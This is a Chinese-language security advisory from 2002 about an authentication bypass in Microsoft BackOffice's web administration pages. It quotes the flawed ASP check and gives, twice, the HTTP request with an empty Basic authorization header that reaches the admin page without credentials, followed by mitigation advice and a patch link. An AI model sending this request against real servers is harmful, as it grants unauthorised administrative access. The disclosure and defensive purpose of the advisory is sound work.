Back Office远程Web管理接口可绕过认证访问漏洞
发布日期:2002-04-16
更新日期:2002-04-19
受影响系统:Microsoft BackOffice 4.0
- Microsoft Windows NT 4.0
Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
描述:
BackOffice是一组集成的运行于Windows NT Server 上的服务器应用组件。
BackOffice中的WEB管理ASP页面在处理用户验证时存在漏洞,可导致攻击者无需用户名和密码访问管理页面。
每个BackOffice中的WEB管理ASP页面使用如下代码来进行用户验证:
If Request.ServerVariables("auth_type") = "" Then
Response.Status = "401 ACCESS DENIED"
Response.End
End If
上面代码只执行了"authorization/authentication"来进行验证,而使用如下请求可以无需用户名和密码对管理员页面进行访问:
GET /BOADMIN/BackOffice/SERVICES.ASP HTTP/1.1
Host: hostname
Authorization: Basic
[enter]
[enter]
由于上面设置了auth_type变量,所以可以无需认证进行访问。
一般Back Office Web管理接口默认只限制环回接口(127.0.0.1),所以不能远程进行访问,但也存在管理员设置成可以远程访问的情况。
<*来源:NGSSoftware Insight Security Research (
nisr@nextgenss.com)
链接:
http://archives.neohapsis.com/archives/bugtraq/2002-04/0208.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
NGSSoftware Insight Security Research (
nisr@nextgenss.com)提供了如下测试方法:
GET /BOADMIN/BackOffice/SERVICES.ASP HTTP/1.1
Host: hostname
Authorization: Basic
[enter]
[enter]
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 对Web管理端口设置访问过滤,只允许合法可信的用户访问。
厂商补丁:
Microsoft
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://support.microsoft.com/default.aspx?scid=http%3a%2f%2fwww.microsoft.com%2fdownloads%2frelease.asp%3fReleaseID%3d37717浏览次数:3205
严重程度:0(网友投票)